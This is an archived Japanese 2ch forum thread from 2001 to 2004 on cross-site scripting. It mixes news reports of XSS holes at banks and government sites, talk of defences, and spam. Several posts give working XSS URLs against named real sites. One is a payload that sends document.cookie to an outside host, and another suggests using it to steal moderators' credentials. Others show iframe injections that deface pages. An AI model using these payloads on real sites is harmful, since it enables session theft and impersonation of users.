5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

クロスサイトスクリプティング

1 :名無しさん@お腹いっぱい。:01/10/27 14:33
http://securit.etl.go.jp/research/paper/css2001-takagi-dist.pdf
案外対策取られてないものですね。
クライアントサイドからもサーバサイドからも両面で対策しないと
まずいですね。
皆さんはどんな対策とってますか?

2 :名無しさん@お腹いっぱい。:01/10/27 14:37
WebProg板にも同じようなスレが立ったんですが、
どうしましょう?

3 :名無しさん@お腹いっぱい。:01/10/27 19:49
WebProg板でやる?

4 :名無しさん@お腹いっぱい。:01/10/27 19:52
でもクライアント側の話はこっちじゃないかな?

ところで、「セキュリティホール memo ML」のアーカイブに
問題があるって本当?

5 :名無し:01/10/27 22:46
ここのArticle 1756 みてみればわかる。
http://memo.st.ryukoku.ac.jp/archive/200110.month/index.html

6 :名無しさん@お腹いっぱい。:01/10/28 03:14
>>5
ほんとだ。こりゃまずいわ。しかも高木さんの投稿、10月26日
じゃん

7 :エスケープ無しさん:01/10/28 05:39
http://galaxy.rwcp.or.jp/
ここは本文からしてだめだね。
引用の記号見るだけでエスケープされてないのが分かる。

8 :名無しさん@お腹いっぱい。:01/11/01 06:00
1のPDFに書いてあったけど、
これって。。。。
http://pc.2ch.net/../<S>test</S>
APACHEが古いの?

9 :名無しさん@お腹いっぱい。:01/11/02 22:31
最悪の場合トリップやキャップが漏れるね。
夜勤さんに報告したほうがいいのかな?

10 :名無しさん@お腹いっぱい。:01/11/03 06:18
こんな感じでどこにでも吹っ飛ばせる。
http://pc.2ch.net/../<SCRIPT>{location.href='http://www.2ch.net/?'+document.cookie}</SCRIPT>

11 :名無しさん@お腹いっぱい。:01/11/03 22:41
http://pc.2ch.net/../%3CSCRIPT%3E{location.href=%27http://www.2ch.net/?%27+document.cookie}%3C/SCRIPT%3E

12 :11:01/11/03 22:44
エスケープするとエラー画面上でもエスケープされるから
問題ないのか
でもlocationとかで転送するという手はありそうだなあ。
で、転送URLを貼ったカキコを「エロ画像です。削除してください」
とか言って削除依頼すれば削除人のキャップを抜き放題(w

13 :名無しさん@お腹いっぱい。:01/11/10 11:24
まだなおってない (`皿′)ノ age

14 :>11:01/11/10 13:32
http://pc.2ch.net/../%3CSCRIPT%3E{location.href=%27http://www.2ch.net/?%27+document.cookie}%3C/SCRIPT%3E

を開くと、
ページが見つかりません 
HTTP 400 - 不正な要求
Internet Explorer

となる。

15 :名無しさん@お腹いっぱい。:01/11/12 07:25
>>14
ネスケでやってみれ.
IEなら,インターネットオプションの詳細設定のブラウズの,
HTTPエラーメッセージを簡易表示するのチェックを外してみれ.

16 :>15:01/11/12 15:38
簡易表示するのチェックを外してみたところ、
Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET /../%3CSCRIPT%3E{location.href=%27http://www.2ch.net/?%27+document.cookie}%3C/SCRIPT%3E HTTP/1.1

となった。ネスケでは後日やってみます。
IEは5.01SP2です。

17 :cookieが表示されない:01/11/12 16:35
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/
MS01-055: Cookie Data in IE Can Be Exposed or Altered Through Script Injection (セキュリティアンテナ, 2001.11.09)にあるデモ

http://www.solutions.fi/index.cgi/extra_iebug?lang=eng
でamazon.co.jpを読むと(事前にamazon.co.jpのcookieを取り込んである)
MSIE cookie vulnerability test page
This page displays the cookies found on your browser for site amazon.co.jp:
Cookies:
No cookies found for site...
Click here to make new search for cookies.
−−−−−
アクティブスクリプトに対して「プロンプトを表示」で表示されたら
はい(Y)を選択する。
こんなダイアログ−http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/ie6-script-dialog.png
−−−−−
アクティブスクリプトを実行しなければ "; document.location=url; と表示される。
−−−−−
デモが表示された後、「戻る」と
警告: ページの有効期限切れ 要求したページは、フォームで送信された情報を使用して作成されました。このページは、もう利用できません。セキュリティ保護のため、情報は自動的には再送信されません。
情報を再送信し、この Web ページを表示するには、ツール バーの [更新] ボタンをクリックしてください。 となる。

18 :名無しさん@お腹いっぱい。:01/11/12 19:30
>>16
ここで試してみれ。
http://slashdot.jp/comments.pl?sid=01/11/09/0844243&cid=30

19 :>18:01/11/12 23:36
http://pc.2ch.net/../<SCRIPT>alert('hello')</SCRIPT>

Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET /../%3CSCRIPT%3Ealert('hello')%3C/SCRIPT%3E HTTP/1.0
−−−−−
HTTP/1.0となっている。 16は1.1だが。

20 :名無しさん@お腹いっぱい。:01/11/13 05:52
>>14
11では抜けないことは確認済み。

21 :名無しさん@お腹いっぱい。:01/11/13 06:25
BBS_UNICODE=passな板なら数値文字参照を使って
クリック一発なURLを生成できた
「HTTPエラーメッセージの簡易表示」対策はしてないけど
http://teri.2ch.net/test/read.cgi/accuse/1005368156/110

22 :名無しさん@お腹いっぱい。:02/02/04 21:48
バカボンド age!

23 :名無しさん@お腹いっぱい。:02/03/22 12:00
http://ime.nu/<script>alert('hogehoge')</script>

24 :名無しさん@お腹いっぱい。:02/03/22 12:02
http://ime.nu/%3Cscript%3Ealert%28'hogehoge'%29%3C/script%3E

25 :名無しさん@お腹いっぱい。:02/03/22 12:03
http://ime.nu/%3Cscript%3Ealert%28%27hogehoge%27%29%3C/script%3E

26 :名無しさん@お腹いっぱい。:02/03/23 23:20
http://example.com/<test

27 :名無しさん@お腹いっぱい。:02/03/23 23:22
http://example.com/>test

28 :名無しさん@お腹いっぱい。:02/04/08 22:04
アゲとくか

29 :名無しさん@お腹いっぱい。:02/04/09 21:34
officeのタカリネタ

30 :名無しさん@お腹いっぱい。:02/04/10 05:15
CSSのスレは前からあったんだね。できれば荒らされないようにsage進行キボン。
当面、銀行スレからコピペで情報もってくるかな。

31 :名無しさん@お腹いっぱい。:02/04/11 03:05
クロスサイトスクリプティング脆弱性レポートページが登場(2002.3.9)

 クロスサイトスクリプティング脆弱性に関する啓蒙活動を行っている office 氏が、これまでに発見したクロス
サイトスクリプティングのうち代表的なものを紹介するページを公開した。

 このページには、マイクロソフト、楽天、ジャパンネットバンク銀行などンなど大手企業のクロスサイトスクリプ
ティング脆弱性が報告されている。


Cross Site Scripting Holes
http://www.office.ac/holes.html

(詳しくはScan および Scan Daily EXpress 本誌をご覧ください)
http://shop.vagabond.co.jp/m-ssw01.shtml
http://shop.vagabond.co.jp/m-sdx01.shtml


https://www.netsecurity.ne.jp/article/1/4278.html

32 :名無しさん@お腹いっぱい。:02/04/11 03:10
みずほ銀行のWebサイトにクロスサイトスクリプティングの脆弱性

 4月1日より開業したみずほ銀行だが、相次ぐトラブルの中、あらたに同行のWebサイトに
クロスサイトスクリプティングの脆弱性が発見された。

 この問題は、クロスサイトスクリプティング問題の調査と啓蒙を行っているoffice 氏が発見
したもので、同行のインターネットバンキングサービスのログイン画面などに脆弱性が存在
している。この脆弱性を利用することにより、偽装した画面を表示すること可能で、顧客番号
や口座番号、暗証番号をリダイレクトさせることもできるなど、非常に危険な状態である。

 同行は合併に伴うシステムの移行が遅れ、挙げ句の果てにATMという基本的なシステム
が使えないと言う大失態を犯してしまうなど、トラブルが多発している。今回のクロスサイト
スクリプティングの脆弱性も、十分な検証が行われないままスタートした同行の慌てぶりを
象徴する事件であるといえよう。

 大手銀行の合併が相次いだが、きわめてクリティカルな状況におかれる銀行においては、
システムの十分な検証が何よりも重要な事項である。確かに開業日までにシステムが完成
していることは重要である。しかし、利用者が安心して使用できるシステムを作り上げること
こそが、本当に大切なことであることを、システム担当者には今一度思い出して頂きたい。

http://headlines.yahoo.co.jp/hl?a=20020403-00000010-vgb-sci

33 :名無しさん@お腹いっぱい。:02/04/15 22:55
ちゃんねる検索を2ちゃんねる化
http://2ch.dyn.to/cgi-bin/namazu.cgi?idxname=../<SCRIPT%20DEFER>document.body.innerHTML='<html><head><title>2%82%BF%82%E1%82%F1%82%CB%82%E9%82%D6%82%E6%82%A4%82%B1%82%BB</title>
</head><body><iframe%20src%3Dhttp://www.2ch.net/%20frameborder%3Dno%20border%3D0%20width%3D100%25%20height%3D100%25%20marginwidth%3D0%20marginheight%3D0></iframe></body></html>';</script>

一行につなげて打ち込んで

34 :名無しさん@お腹いっぱい。:02/04/15 23:21
東京大学が2ちゃんねる
(1行につなげてね)
http://www.utnl.gen.u-tokyo.ac.jp/cgi-bin/namazu.cgi?idxname=../<SCRIPT%20DEFER>document.body.innerHTML='<html><head>
<title>2%82%BF%82%E1%82%F1%82%CB%82%E9%82%D6%82%E6%82%A4%82%B1%82%BB</title></head><body><iframe%20src%3Dhttp://www.2ch.net/
%20frameborder%3Dno%20border%3D0%20width%3D100%25%20height%3D100%25%20marginwidth%3D0%20marginheight%3D0></iframe></body></html>';</script>



35 :名無しさん@お腹いっぱい。:02/04/15 23:24
http://sv2.humeco.m.u-tokyo.ac.jp/cgi-bin/namazu.cgi?idxname=../<SCRIPT%20DEFER>document.body.innerHTML='<html>
<head><title>2%82%BF%82%E1%82%F1%82%CB%82%E9%82%D6%82%E6%82%A4%82%B1%82%BB</title></head><body><iframe%20src%3D
http://www.2ch.net/%20frameborder%3Dno%20border%3D0%20width%3D100%25%20height%3D100%25%20marginwidth%3D0%20marginheight%3D0></iframe></body></html>';</script>



36 :名無しさん@お腹いっぱい。:02/04/15 23:28
タイトルは body.innderHTML= じゃ変わらないね。
document.title= でどうよ。

37 :名無しさん@お腹いっぱい。:02/05/04 06:00
UFJ銀行のサーバーにクロスサイトスクリプティングの脆弱性(2002.1.17)
https://www.netsecurity.ne.jp/article/1/3737.html

首相官邸のホームページにクロスサイトスクリプティングの脆弱性(2002.3.13)
https://www.netsecurity.ne.jp/article/1/4313.html

首相官邸にクロスサイトスクリプティング問題 任意のメッセージを表示可能(2002.3.14)
https://www.netsecurity.ne.jp/article/1/4337.html

警察庁、外務省、公安委員会のWebサイトにクロスサイトスクリプティング(2002.3.19)
https://www.netsecurity.ne.jp/article/1/4403.html

みずほ銀行のWebサイトにクロスサイトスクリプティングの脆弱性(2002.4.3)
https://www.netsecurity.ne.jp/article/1/4636.html

【Webサーバに起因するクロスサイトスクリプティング脆弱性(1)】(執筆:office)(2002.4.25)
https://www.netsecurity.ne.jp/article/3/4924.html

38 :名無しさん@お腹いっぱい。:02/05/04 06:35
NetscapeとMozillaにローカルファイルが読み出せるセキュリティホール(2002.5.2)

 Netscape6.1以上とMozilla0.9.7以上のバージョンに、ローカルファイルが閲覧出来るという問題が
発見された。この問題は、XMLHTTPコンポーネントに存在するセキュリティホールを利用することで、
リモートからローカルファイル転送出来るという物。

 このセキュリティホールを発見したのは、イスラエルのGreyMagic Softwareで、同社は昨年の12月
にInternet Explorerでも同様の問題を発見している。マイクロソフトでは、この問題に対するパッチを
提供済みだ。

 GreyMagic社によると、この問題をNetscapeに通達しているが、Netscapeからの連絡は現在の所
無いという。なお、Netscapeでは、危険性の高いバグを発見した物に対し1,000ドルを支払うという
「Bug Bounty Program」を実施しているものの、この件に対し何の返事もないことに、GreyMagic社
はNetscapeの対応の悪さを糾弾している。

https://www.netsecurity.ne.jp/article/1/5021.html

39 :ヤプーニュース Scanの報道を握り潰し か?:02/05/13 18:07
https://www.netsecurity.ne.jp/article/1/5129.html
クロスサイトスクリプティング攻撃がYahoo!オークションに仕掛けられる(2002.5.13)

この記事が Yahoo!ニュースに未だ掲載されず。
http://headlines.yahoo.co.jp/hl?c=sci&t=l

40 :名無しさん@お腹いっぱい。:02/05/13 18:12
>>39 ソフトバンク系の会社はいかがわしいので公正を期待してはいけない(w
ZDNet(ソフトバンクの子会社)もいつもソフトバンクの都合悪いことは
報道しないでしょ。

41 :名無しさん@お腹いっぱい。:02/05/13 18:40
今回はYahoo工作員になってやろう。

こんなのクロスサイトスクリプティングじゃねーだろ。
オヒイスが無知を糊塗するために広義のクロスサイトスクリプティングなどとごまかしたもんだから墓穴を掘ることになった。
ユーザが外部からスクリプト持ち込めるホストは全部脆弱性があるとでも言うつもりだろうか? めでてーな。ゲラゲラ


42 :名無しさん@お腹いっぱい。:02/05/13 18:50
http://www.geocities.jp/yamasan_gogo/index.htm


43 :名無しさん@お腹いっぱい。:02/05/13 18:58
>>41
Yahoo Auction は、クッキー盗まれたらヤバイだろ。
証明して欲しいのか?>工作員


44 :名無しさん@お腹いっぱい。:02/05/13 19:44
まさかクッキー値だけで認証してるとでも。 ゲラゲラ
Yahoo Japanはへっぽこだが本家Yahoo Inc.はそのくらいの技術力は持ってるぞ。
クッキーは同一IPアドレスに対して有効。(その他も見てるかも)

45 :名無しさん@お腹いっぱい。:02/05/13 21:39
44 が本物の工作員なら困ったことだな。
同一IPのチェックしてれば問題ないとでも?
ケーブル民はどうなってもいいのか。
つーか、同一IPチェックしてたら企業ユーザが使えなくなる。

46 :名無しさん@お腹いっぱい。:02/05/13 21:40
ttp://www.pos.to/%3C%73C%72%69%70%74%3E%61%6C%65%72%74%28%22%82%DC%82%BD%E9%78%82%B3%82%EA%82%BD%82%F1%82%BE%82%CB%28%CC%DF%22%29%3C%2F%73C%72%69%70%74%3E

47 :名無しさん@お腹いっぱい。:02/05/13 22:11
>>45
それだけやっても抜けるのは登録メアド、登録してあれば名前,住所等個人情報(登録はオプション)。
自己紹介と登録メアドは悪戯できるな。

48 :名無しさん@お腹いっぱい。:02/05/13 22:27
他人の垢で入札したり、他人の入札をキャンセルしたりできるんでねーの?

49 :名無しさん@お腹いっぱい。:02/05/13 22:29
入札のときはパスワードいるだろ。キャンセルはわからん。

50 :michimi:02/05/26 10:42
[The Cross Site Scripting FAQ]
http://slashdot.jp/article.pl?sid=02/05/22/1134226

51 :名無しさん@お腹いっぱい。:02/05/27 00:46
メールアドレスを変更して、そのアドレスにパスワード送らせることができる。
ただし、母親の旧姓だの、ペットの名前だのが必要になるが。

52 :名無しさん@お腹いっぱい。:02/06/03 14:50
「旅の窓口」mytrip.net にクロスサイトスクリプティング脆弱性(2002.6.3)

 宿泊情報・観光情報、予約サービスを提供する「旅の窓口」mytrip.net にクロス
サイトスクリプティング脆弱性が発見された。

 この問題により、Cookie情報の取得や悪意のあるページを作成することが可能に
なっていた。しかし、幸いなことに同サイトではCookie情報を利用していたが、現在
Cookieだけで認証は行っていないため、悪用される危険性は無かったようだ。

 同サイトでは、クロスサイトスクリプティングに対する脆弱性を修正するとともに、
「 < 」「 > 」などといった特殊文字を、予約情報や掲示板などのサイト内で入力可
能な項目に使用することを禁止している。現在、これらの文字を含んだ項目を入力
しようとした場合には、警告を表示し入力を受け付けないよう、修正が施されている。

「旅の窓口」クロスサイト・スクリプティングの脆弱性について
http://www.mytrip.net/aboutcss.html

https://www.netsecurity.ne.jp/article/1/5388.html

53 :名無しさん@お腹いっぱい。:02/06/03 15:43
>>52
旅窓は認証自体ヤバイだろ メアドと電話番号だぞ

54 :名無しさん@お腹いっぱい。:02/06/10 20:54
なんかね、以前書いた CGI スクリプト見たん
です。そしたら、text/plain でエラーメッセー
ジ出してるじゃないですか。しかもユーザ入
力そのまま入ってるし。text/html じゃない
から平気だと思ってたんだけど。

IE だとヤヴァイらしいから、書き換えますね。
ヤレヤレ…

55 :名無しさん@お腹いっぱい。:02/06/12 10:50
ローカル HTML リソースに存在するクロスサイト スクリプティングの脆弱性。
カスケード スタイル シートのサポートを提供する HTML オブジェクトの使用に関連する情報の漏えいの脆弱性。
Cookie 内のスクリプト処理に関連する情報の漏えいの脆弱性。
ゾーン偽装の脆弱性。
マイクロソフト セキュリティ情報 MS01-058 で説明されている 「Content-Disposition」 の脆弱性の 2 つの変種。

概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Internet Explorer を使用しているお客様

脆弱性の影響 : 6 つの新しい脆弱性。最も深刻な脆弱性については、攻撃者の選択したコードが
実行される可能性があります。

最大深刻度 : 高

推奨する対応策 : Internet Explorer の影響を受けるバージョンを使用しているお客様は直ちに
この修正プログラムをインストールして下さい。

影響を受けるソフトウェア :
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6


2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム (Q321232) (MS02-023)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023.asp


56 :スミルノフ:02/06/27 22:44
Vulnerabilities on Major Websites
http://webmail.linux-tech.com/pipermail/infosec/2002-March/000070.html
によれば

http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=<script>alert("Point+Blank+Security");</script>
がCSSだそうだが、これは現在のところ修正したのかな?効かない。
だけれど
http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=javascript:alert('Point+Blank+Security')

同じく
http://www.fbi.gov/cgi-bin/outside.cgi?<script>alert("Point+Blank+Security");</script>
がCSSだそうだが、これは現在のところ修正したのかな?効かない。
だけれど
http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert('Point+Blank+Security')

なんちゅうか、sage.


57 :スミルノフ:02/06/27 22:52
http://search.linuxsecurity.com/cgi-bin/htsearch?words='></title><script>alert("---")</script>

58 :スミルノフ:02/07/20 18:11
http://search.linuxsecurity.com/cgi-bin/htsearch?words='></title><script>alert("---")</script>
は修正されたみたい。


59 :age:02/08/20 21:46
age

60 :名無しさん@お腹いっぱい。:02/08/20 21:51
某NHKのことかな?

61 :名無しさん@お腹いっぱい。:02/08/20 23:54
某って言うな某って!
棒なら僕の菊穴に入ってるよ、太いやつが・・(ハアハア・・

62 :スンスン&rlo;♪ン〜ス&lre; :02/08/21 02:47
Googleの「巨人 村田」バグの謎は解けたんでしょうか?

63 :名無しさん@お腹いっぱい。:02/09/03 19:12
あげ

64 :砂漠の秘密都市:02/09/08 16:18

IEを使って次の問いに答えよ。
設問:次の二つのURLでの挙動の違いとは何か?
ttp://sunsolve.sun.com/<p/style=background-image:url(javascript:document.URL=document.URL)>
ttp://sunsolve.sun.com/<script>document.URL=document.URL;</script>


65 :age:02/10/18 21:09
age

66 :名無しさん@お腹いっぱい。:02/10/24 02:49
>>64 は何?

67 :名無しさん@お腹いっぱい。:02/10/26 16:36
とっても便利
どこからでもメールが送れる
http://www2u.biglobe.ne.jp/~ira/mail.cgi

68 :名無しさん@お腹いっぱい。:02/10/26 16:40
訂正

http://www2u.biglobe.ne.jp/~ira/

69 :名無しさん@お腹いっぱい。:02/10/26 16:42
訂正

http://www2u.biglobe.ne.jp/~ira/mail.log

70 :名無しさん@お腹いっぱい。:02/10/27 01:56
>>67
スレとの関係がわからんが、怖くて使えんよ。

71 :名無しさん@お腹いっぱい。:02/10/27 14:26
>>70
単なるメアド収集なので通報しておきました

72 :名無しさん@お腹いっぱい。:02/10/27 20:02
>>71
どこに?

73 :名無しさん@お腹いっぱい。:02/10/28 00:29
通報しますたにマジレスする香具師がいるとは思わなんだ

74 :名無しさん@お腹いっぱい。:02/11/18 02:33
[memo:4996] 愛知県避難所支援システムの XSS 脆弱性

75 :age:03/01/04 20:20
age

76 :山崎渉:03/01/15 15:47
(^^)

77 :age:03/03/19 10:39
age

78 :(´-ω-`):03/03/19 10:47
見てみ
http://homepage3.nifty.com/digikei/

79 :(´-ω-`) :03/03/19 16:02
>>78
見たよ〜

80 :山崎渉:03/04/17 12:18
(^^)

81 :山崎渉:03/04/20 06:15
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

82 :山崎渉:03/05/22 02:19
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

83 :山崎 渉:03/07/15 11:19

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

84 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:02
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

85 :山崎 渉:03/08/15 23:24
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

86 :名無しさん@お腹いっぱい。:03/10/03 21:19
今でもCSSなんて残ってるの?

87 :名無しさん@お腹いっぱい。:03/10/03 21:24
だから古いスレ上げるなバカ

88 :名無しさん@お腹いっぱい。:03/10/03 22:59
>>87
話題が無いなら黙ってれば?

89 :88:03/10/03 23:09
私はsageもできないバカです。

90 :名無しさん@お腹いっぱい。:03/10/03 23:11
>>88
低脳は黙ってろクズ

91 :名無しさん@お腹いっぱい。:03/10/04 00:33
馬鹿どもを晒しage

92 :名無しさん@お腹いっぱい。:03/10/18 13:04
>>86
http://www.crowechizek.com/CC/Global+Navigation/Services/r05_ovr.htm?Serv="><s>


93 :名無しさん@お腹いっぱい。:03/10/19 18:40
今日の情報セキュリティ試験でXSSが出て来た…

94 :名無しさん@お腹いっぱい。:03/10/19 22:37
>>93
Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に
[ b ]が存在した場合には,それらに対するエスケープ処理をWebサーバが
実施しなければならないといったことがあります。

bに相当するのは普通「スクリプト」だと思うんだが、解答群に無かったよな。


95 :名無しさん@お腹いっぱい。:03/10/19 23:44
>>94
メタキャラクタでいいんじゃない?
要は不等号をタグとして扱わなければいい訳だし。

96 :95:03/10/20 07:16
>>95
うん。漏れもメタキャラクタにしたんだけどXSS対策に限定すると
何か回答としてはイマイチだなぁと。

97 :名無しさん@お腹いっぱい。:03/10/27 21:29
総務省お抱えのcrowechizekはFlash,HTML両バージョンともダメダメ。
Flashでは応答返ってこないし、HTMLでは文字大きくなるし。
"<H1>No medicine can cure a fool</H1>

98 :名無しさん@お腹いっぱい。:03/10/28 22:43
↑IIS?

99 :名無しさん@お腹いっぱい。:03/10/30 10:56
> Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に

リクエストに対して返すコンテンツ中のメタキャラクタを全部エスケープしち
まったら、HTMLが全部ソースで見えちまうだろ。大丈夫か、その試験。

100 :名無しさん@お腹いっぱい。:03/10/30 11:00
>>94
スクリプト を エスケープする とは言わない。
エスケープする対象として日本語的に適切な選択肢を選べば回答できる。

他にはどんな選択肢があったの?

101 :名無しさん@お腹いっぱい。:04/01/07 12:29
最近話題にもならなくなったな

102 :名無しさん@お腹いっぱい。:04/02/04 00:16
クッキーで個人情報を保存するのはどう?
↓使ってみようかと思ってますが大丈夫でしょうか
ttp://resume.meieki.com/

103 :名無しさん@お腹いっぱい。:04/02/04 00:32
URLにスクリプト仕込むのはTHEBBSの人たちが既にやってる
http://hack.dot.thebbs.jp/1068805016.html
JavascriptをいったんString.fromCharCode化してしまえば
全タグ有効っつーかなんでもできるらしい

104 :名無しさん@お腹いっぱい。:04/04/11 21:36
ぱおぱおクッキー

105 :名無しさん@お腹いっぱい。:04/04/11 23:30
2chにもクロスサイトスクリプティング脆弱性は結構あるよ。

106 :名無しさん@お腹いっぱい。:04/04/12 08:53
言うだけなら誰でも出来る罠

107 :名無しさん@お腹いっぱい。:04/04/12 11:29
>>106
実際にやるとどこかのおバカさんみたいに
ムショに連行される罠w

108 :名無しさん@お腹いっぱい。:04/04/12 13:29
と言い訳をして具体例も挙げられない馬鹿もいるようで。

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)